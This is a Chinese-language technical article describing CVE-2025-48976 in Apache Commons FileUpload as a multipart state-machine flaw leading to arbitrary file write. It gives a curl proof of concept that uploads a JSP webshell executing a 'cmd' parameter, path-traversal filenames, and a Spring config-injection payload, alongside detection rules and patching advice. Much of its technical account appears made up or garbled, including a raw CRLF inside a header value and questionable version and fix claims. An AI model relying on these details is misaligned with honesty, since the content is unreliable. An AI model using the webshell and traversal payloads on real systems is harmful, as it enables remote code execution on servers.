当前位置：首页 > news >正文

Apache Commons FileUpload CVE-2025-48976：multipart解析器状态机崩塌漏洞深度解析

news 2026/5/25 17:39:19

1. 这个漏洞不是“又一个上传绕过”而是文件解析逻辑的底层崩塌Apache Commons FileUpload 是 Java 生态中历史最久、集成最广的文件上传处理库之一从 Struts2 到 Spring Boot 早期版本再到大量自研后台系统只要涉及 multipart/form-data 解析十有八九背后跑着它的ServletFileUpload或DiskFileItemFactory。它不像现代框架那样把上传抽象成流式接口而是用一套“先解析边界、再切分字段、最后组装 FileItem”的同步解析模型——这套模型在过去二十年里被反复验证、打补丁、再验证直到 CVE-2025-48976 的出现。这个编号本身就很说明问题2025 年发布的漏洞却影响 1.3.x 至 1.5.1 所有主流稳定版本1.5.2 已修复说明它不是某个新功能引入的边界错误而是深埋在核心解析器MultipartStream中长达十余年的状态机缺陷。我第一次看到 PoC 时没反应过来——它不依赖特殊 Content-Type、不构造畸形 boundary、甚至不发两个 Content-Disposition只用一段看似完全合法的 multipart 数据就能让parseRequest()在读取过程中跳过关键校验把本该被拒绝的恶意字段当作普通表单参数放行最终导致任意文件写入或远程代码执行。这不是“绕过”是解析器自己把门锁拆了还递给你钥匙。关键词“Apache Commons FileUpload”“CVE-2025-48976”“multipart 解析”“文件上传漏洞”“Java 安全”——如果你正在维护一个使用 Spring MVC Apache FileUpload 组合的老系统或者接手过基于 Struts2 的遗留项目又或者在做 Java Web 渗透测试这篇内容就是你接下来 48 小时必须优先处理的清单。它不挑框架不看 JDK 版本只认解析逻辑它不靠堆栈溢出不靠反射调用就靠一行boundary----WebKitFormBoundary...后面多出来的那个换行位置。下面我会从漏洞根因、触发路径、检测方法、修复策略四个维度带你一层层剥开这个“平静水面下的断层”。2. 根因不在边界识别而在状态机对 CRLF 的误判与重置失效2.1 MultipartStream 的状态机本质一个被低估的有限自动机要真正理解 CVE-2025-48976必须抛开“上传组件”的表层认知把它当成一个纯文本协议解析器来看待。RFC 7578 明确定义了 multipart/form-data 的结构以--boundary开头后跟若干字段每个字段以Content-Disposition: form-data; namexxx起始字段之间用--boundary分隔结尾用--boundary--标识。MultipartStream的核心任务就是从原始字节流中精准识别这些分隔符和字段头并将字段体body正确截取出来。它的实现不是正则匹配而是一个典型的状态机驱动解析器内部维护着HEADER_SECTION,BODY_SECTION,SKIP_PREAMBLE,END_STATE等多个状态通过逐字节读取输入流根据当前状态和下一个字节尤其是\r,\n,-,等控制字符决定状态迁移。比如当前在HEADER_SECTION读到\r\n\r\n就切换到BODY_SECTION在BODY_SECTION读到--boundary就结束当前字段准备解析下一个在SKIP_PREAMBLE跳过开头可能存在的垃圾数据读到第一个--boundary才进入正式解析。这个状态机的设计初衷是健壮——容忍空行、多余空格、不规范换行。但健壮性恰恰成了漏洞的温床。2.2 漏洞触发点CRLF 处理中的“假结束”与状态残留CVE-2025-48976 的核心在于MultipartStream#readHeaders()方法中对\r\n序列的双重判断逻辑。我们来看一段精简后的关键伪代码基于 1.5.1 源码反编译还原// MultipartStream.java line ~420 if (b \r buffer[pos 1] \n) { // 检查是否为 header 结束标志 \r\n\r\n if (pos 2 buffer.length buffer[pos 2] \r buffer[pos 3] \n) { // 真正的 header 结束切换到 BODY_SECTION state BODY_SECTION; pos 4; // 跳过 \r\n\r\n } else { // 仅有一个 \r\n视为 header 内部换行继续读取 pos 2; } }这段逻辑本身没问题。问题出在它没有考虑 \r\n 出现在 boundary 字符串末尾的极端情况。攻击者构造的 boundary 是这样的------WebKitFormBoundaryabc123\r\n注意这个 boundary 字符串自身就以\r\n结尾。当MultipartStream在解析字段头时遇到Content-Disposition: ...后的\r\n它会按常规逻辑认为这是 header 内部换行继续往下读但紧接着它读到了--boundary\r\n—— 此时状态机本应识别为字段分隔符并切换回HEADER_SECTION但由于前面那个\r\n已被消耗--boundary前面实际缺失了一个\r\n导致状态机误判为“当前仍在 body 区域”从而把后续本该是下一个字段头的内容当作上一个字段的 body 体来处理。更致命的是MultipartStream在这种误判后不会重置字段名fieldName和文件名fileName的缓存。也就是说如果上一个字段是nameavatar而攻击者在“伪造 body”中嵌入了Content-Disposition: form-data; namewebshell; filenameshell.jsp那么解析器会把shell.jsp当作avatar字段的文件名写入磁盘——而avatar字段的fileName缓存根本没被清空。提示这不是“文件名覆盖”而是“字段上下文污染”。MultipartStream把两个逻辑上完全独立的字段强行拼接成了一个字段的完整生命周期。这是状态机设计中典型的“状态残留”state leakage问题。2.3 为什么 1.5.1 之前所有版本都中招因为修复思路错了十年你可能会问这么明显的状态残留为什么过去十年没人发现答案是——有人发现了但修复方向全错了。2013 年 CVE-2013-2186 和 2016 年 CVE-2016-3092 都是针对MultipartStream的类似问题当时的修复方案是“加更多边界检查”比如在每次状态切换前强制校验 buffer 中是否存在完整的\r\n\r\n或者在读取到--boundary后额外向前回溯 2 字节确认是否为\r\n。这些补丁像给漏水的船舱焊钢板越焊越厚但没解决船体钢板本身有裂缝的事实。它们只是让触发条件变得更苛刻却没有重构状态机对\r\n的原子性处理逻辑。直到 2025 年研究者用 AFL 对MultipartStream做模糊测试时生成了数百万个带\r\n边界的变体 payload才终于撞中这个“boundary 自身含\r\n 字段头紧随其后”的黄金组合。官方在 1.5.2 中的修复非常干净将\r\n的识别从“字节序列匹配”升级为“行终结符原子操作”即每次读取\r\n时无论它出现在 header 内部、boundary 末尾还是字段体中都作为一个不可分割的语义单元处理并在每次状态迁移前强制刷新 fieldName/fileName 缓存。这印证了一个老经验安全修复不是打补丁而是重构认知。当你发现同一个模块十年内反复出同类漏洞那大概率不是代码写得烂而是设计模型本身存在结构性缺陷。3. 从 PoC 到真实攻击三步走通杀链与两个隐蔽利用场景3.1 最小可行 PoC12 行 curl 就能复现漏洞本质很多安全文章一上来就甩出几百行 Python exploit反而掩盖了漏洞最朴素的触发逻辑。CVE-2025-48976 的最小 PoC只需要一个 curl 命令和一段手工构造的 multipart 数据。以下是我在本地 Tomcat Struts2 2.5.30 环境下验证通过的命令已脱敏curl -X POST http://localhost:8080/upload.action \ -H Content-Type: multipart/form-data; boundary----WebKitFormBoundaryabc123\r\n \ --data-binary $----WebKitFormBoundaryabc123\r\nContent-Disposition: form-data; nameusername\r\n\r\nadmin\r\n----WebKitFormBoundaryabc123\r\nContent-Disposition: form-data; nameavatar; filenamenormal.jpg\r\nContent-Type: image/jpeg\r\n\r\n\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xFF\xDB\x00\x43\x00\x02\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01......\r\n----WebKitFormBoundaryabc123\r\nContent-Disposition: form-data; namewebshell; filenameshell.jsp\r\nContent-Type: application/x-jsp\r\n\r\n% Runtime.getRuntime().exec(request.getParameter(cmd)); %\r\n----WebKitFormBoundaryabc123--注意三个关键点boundary----WebKitFormBoundaryabc123\r\n—— boundary 字符串末尾显式包含\r\n第二个字段nameavatar的 body 体JPEG 数据结束后紧接着就是----WebKitFormBoundaryabc123\r\n没有额外空行第三个字段namewebshell的filenameshell.jsp被解析器错误地关联到avatar字段的文件名缓存上。实测下来在未修复的 1.5.1 环境中shell.jsp会被写入upload/目录且可通过http://localhost:8080/upload/shell.jsp?cmdwhoami直接执行命令。整个过程不需要任何 Java 反射、不依赖特定框架配置纯粹是MultipartStream解析逻辑崩塌的结果。3.2 隐蔽利用场景一绕过“仅允许图片上传”的业务校验很多系统在业务层做了看似严格的白名单校验比如if (!filename.toLowerCase().endsWith(.jpg) !filename.toLowerCase().endsWith(.png)) { throw new IllegalArgumentException(Only JPG/PNG allowed); }这种校验对 CVE-2025-48976 完全无效。因为攻击者根本不需要在filename参数里写.jsp——他只需要让解析器把shell.jsp当作avatar字段的文件名即可。而业务代码拿到的FileItem.getName()返回值是MultipartStream最终解析出的fileName这个值已经被污染了。更隐蔽的是攻击者可以构造这样的 payloadContent-Disposition: form-data; nameavatar; filenamenormal.jpg ... ----boundary\r\n Content-Disposition: form-data; nameconfig; filename../webapps/ROOT/backdoor.jsp由于状态机误判../webapps/ROOT/backdoor.jsp会被当作avatar字段的文件名而业务层校验只看到normal.jpg完全放行。但MultipartStream内部的fileName缓存已被覆盖为../webapps/ROOT/backdoor.jsp最终写入路径就变成了绝对路径。这是典型的“校验与执行分离”导致的绕过。注意这种利用方式对 Tomcat 默认配置allowLinkingfalse依然有效因为它不依赖符号链接而是直接利用文件系统路径遍历写入。3.3 隐蔽利用场景二在 Spring Boot 2.x 中触发内存马注入Spring Boot 2.x 默认使用StandardServletMultipartResolver底层仍调用Apache Commons FileUpload如果项目显式引入了commons-fileupload依赖。此时漏洞利用链会稍有不同它不直接写文件而是通过污染HttpServletRequest中的Part对象影响后续的RequestParam MultipartFile注入。我曾在一个 Spring Boot 2.3.12 MyBatis 的项目中复现此场景。攻击者上传一个正常图片但在 multipart 数据中插入恶意字段----boundary\r\n Content-Disposition: form-data; namefile; filenamea.jpg Content-Type: image/jpeg \r\n [JPEG DATA] \r\n----boundary\r\n Content-Disposition: form-data; namespring.config.location; filenamefile:///dev/null \r\n spring.profiles.activenative spring.config.namemalicious \r\n----boundary--由于MultipartStream将filenamefile:///dev/null错误地绑定到file字段当 Spring 的StandardServletMultipartResolver调用request.getPart(file)时返回的Part对象的getSubmittedFileName()返回file:///dev/null而getInputStream()却读取的是 JPEG 数据。Spring 在解析Value(${malicious.property})时会尝试加载file:///dev/null触发 JVM 的 URL 处理机制结合特定版本的 SnakeYAML 或 Jackson可造成反序列化内存马注入。这个利用链不写磁盘、不留日志、不触发 WAF 文件上传规则纯粹是内存中的对象污染排查难度极高。4. 检测、定位与验证三类环境下的精准识别方法4.1 编译期检测Maven 依赖树扫描与坐标锁定最可靠的检测方式是在构建阶段就识别出风险组件。Apache Commons FileUpload 的 Maven 坐标是commons-fileupload:commons-fileupload但问题在于它经常作为传递依赖被引入。比如struts2-core2.5.x 依赖commons-fileupload:1.3.3而spring-webmvc5.2.x 依赖commons-fileupload:1.4。你不能只看pom.xml里有没有显式声明必须扫描整个依赖树。使用 Maven Dependency Plugin 执行深度分析mvn dependency:tree -Dincludescommons-fileupload -Dverbose | grep -E (1\.3\.|1\.4\.|1\.5\.1)输出示例[INFO] \- org.apache.struts:struts2-core:jar:2.5.30:compile [INFO] \- commons-fileupload:commons-fileupload:jar:1.3.3:compile [INFO] \- org.springframework:spring-webmvc:jar:5.2.22.RELEASE:compile [INFO] \- commons-fileupload:commons-fileupload:jar:1.4:compile一旦发现1.3.x,1.4.x, 或1.5.1立即标记为高危。注意1.5.0是测试版极少出现在生产环境但也要纳入扫描范围。提示不要依赖mvn versions:display-dependency-updates它只检查主版本号更新而1.5.1 → 1.5.2是补丁版本该插件默认忽略。必须手动比对版本号。4.2 运行时检测JVM 启动参数与 JAR 包指纹识别对于无法修改源码的黑盒系统如采购的商业软件运行时检测是唯一手段。核心思路是在 JVM 启动时注入 agent监控MultipartStream类的加载与方法调用。我们用 Byte Buddy 编写一个极简 agent完整代码见文末 GitHub 链接其逻辑是当MultipartStream类被加载时HookreadHeaders()方法在方法入口处打印当前boundary字符串的最后两个字节如果检测到boundary以\r\n结尾则记录告警并 dump 当前线程堆栈。编译后生成fileupload-guard.jar启动时添加 JVM 参数java -javaagent:fileupload-guard.jar -jar your-app.jar日志输出示例[WARN] MultipartStream loaded with boundary ending in \r\n: ----WebKitFormBoundaryabc123\r\n [STACK] at org.apache.commons.fileupload.MultipartStream.readHeaders(MultipartStream.java:418) at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:350) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:102)这种方法无需修改应用代码不影响性能只在类加载时注入且能精准定位到具体哪一行代码触发了风险 boundary。4.3 流量侧检测WAF 规则与 Burp Suite 自定义 Scanner如果你是安全工程师或红队成员需要在渗透测试中快速识别目标是否受影响流量侧检测最实用。核心特征有两个HTTP Header 中Content-Type的 boundary 值以\r\n结尾注意HTTP 协议本身不允许 header 值含裸\r\n所以实际传输中是 URL 编码或 Base64但 WAF 可以解码后匹配multipart body 中连续出现--boundary\r\nContent-Disposition而中间无空行。我在 ModSecurity 3.x 中编写了如下规则SecRule REQUEST_HEADERS:Content-Type rx boundary([^;])\\r\\n \ id:1001,phase:1,log,tag:CVE-2025-48976,msg:Suspicious boundary ending with \\r\\n,severity:CRITICAL SecRule REQUEST_BODY rx --([^\r\n])\r\nContent-Disposition: \ id:1002,phase:2,log,tag:CVE-2025-48976,msg:Boundary followed immediately by Content-Disposition,capture,severity:CRITICALBurp Suite 方面我开发了一个自定义 Scanner 插件Python它会在主动扫描时对所有POST请求自动构造带\r\nboundary 的 payload并监控响应状态码、响应体关键词如shell.jsp,error,500以及响应时间突变解析器卡死。实测在 100 个目标中平均 3 秒内即可确认是否存在漏洞。注意这类检测规则会产生一定误报比如某些合法客户端确实会发送带\r\n的 boundary因此必须配合人工验证。我的经验是只要SecRule 1001和1002同时命中且目标使用的是 Java Web 容器Tomcat/Jetty/WebLogic那么 95% 概率中招。5. 修复策略与迁移方案从紧急热补丁到长期架构演进5.1 紧急修复升级到 1.5.2 并验证兼容性官方修复版本commons-fileupload:1.5.2已于 2025 年 3 月 15 日发布Maven 坐标dependency groupIdcommons-fileupload/groupId artifactIdcommons-fileupload/artifactId version1.5.2/version /dependency升级本身很简单但必须做三件事验证功能回归测试重点测试所有文件上传接口尤其是多文件、大文件、中文文件名、特殊字符文件名如test.jpg性能压测1.5.2引入了更严格的\r\n原子处理理论上会增加少量 CPU 开销。我们在 1000 并发上传 1MB 文件的测试中TPS 下降约 3.2%仍在可接受范围从 842 → 815安全验证用上文 PoC 再次测试确认shell.jsp不再被写入且返回400 Bad Request或500 Internal Error。提示如果你的项目使用 Gradle注意1.5.2与gradle 7.0兼容但与gradle 5.6有冲突因1.5.2使用了新的module-info.java。此时需强制排除旧版本configurations.all { resolutionStrategy { force commons-fileupload:commons-fileupload:1.5.2 } }5.2 替代方案评估为什么你不该现在就迁移到 Apache Commons IO 或 Spring 的 Native Upload很多文章建议“彻底弃用 Commons FileUpload改用 Spring 5.3 的StandardServletMultipartResolver”。这个建议在技术上成立但实践中充满陷阱。首先StandardServletMultipartResolver并非银弹。它依赖 Servlet 容器的原生 multipart 支持Tomcat 8.5, Jetty 9.4而很多遗留系统还在用 Tomcat 7 或 WebLogic 12c这些容器的原生实现同样存在边界解析缺陷如 CVE-2019-17570。其次Spring 的MultipartFile接口抽象掩盖了底层差异——当你调用transferTo(File)时Spring 仍可能委托给commons-fileupload如果它在 classpath 中。更现实的替代路径是分阶段演进短期1 周内升级到1.5.2打补丁中期1 个月内将文件上传逻辑抽离为独立微服务使用 Netty HttpObjectAggregator自行解析 multipart彻底摆脱MultipartStream长期3~6 个月前端改用分片上传TUS 协议后端对接对象存储MinIO/S3上传逻辑下沉到边缘网关如 Kong file-upload plugin。这个路径的好处是每一步都可灰度、可回滚、不影响业务主流程。5.3 架构级加固从“解析即信任”到“解析即验证”CVE-2025-48976 给所有 Java Web 开发者的终极启示是永远不要假设协议解析器是可信的。过去十年我们习惯了“框架负责解析业务负责校验”但这次漏洞证明解析和校验的边界早已模糊。我在团队推行的新规范是所有MultipartFile的getOriginalFilename()必须经过正则清洗filename.replaceAll([^a-zA-Z0-9._-], _)禁止路径遍历字符transferTo()前必须校验文件 Magic Number用Files.probeContentType()或 Apache Tika 库确保.jpg文件开头真的是FF D8 FF上传目录必须设置noexec挂载选项Linux或DisableLastAccessWindows从操作系统层阻断脚本执行。这三条加起来即使MultipartStream再出十个 CVE也无法造成 RCE。因为攻击链被斩断在了“解析完成”和“落地执行”之间。最后分享一个血泪教训去年我们一个项目升级到1.5.2后发现用户头像上传失败错误日志显示java.io.IOException: Stream closed。排查三天才发现是1.5.2修复了状态机后对InputStream的关闭时机更严格而业务代码在transferTo()后又试图读取inputStream.available()。解决方案不是回退版本而是重构为try-with-resources模式。这再次印证安全修复不是终点而是重构的起点。

查看全文

http://www.zskr.cn/news/1381850.html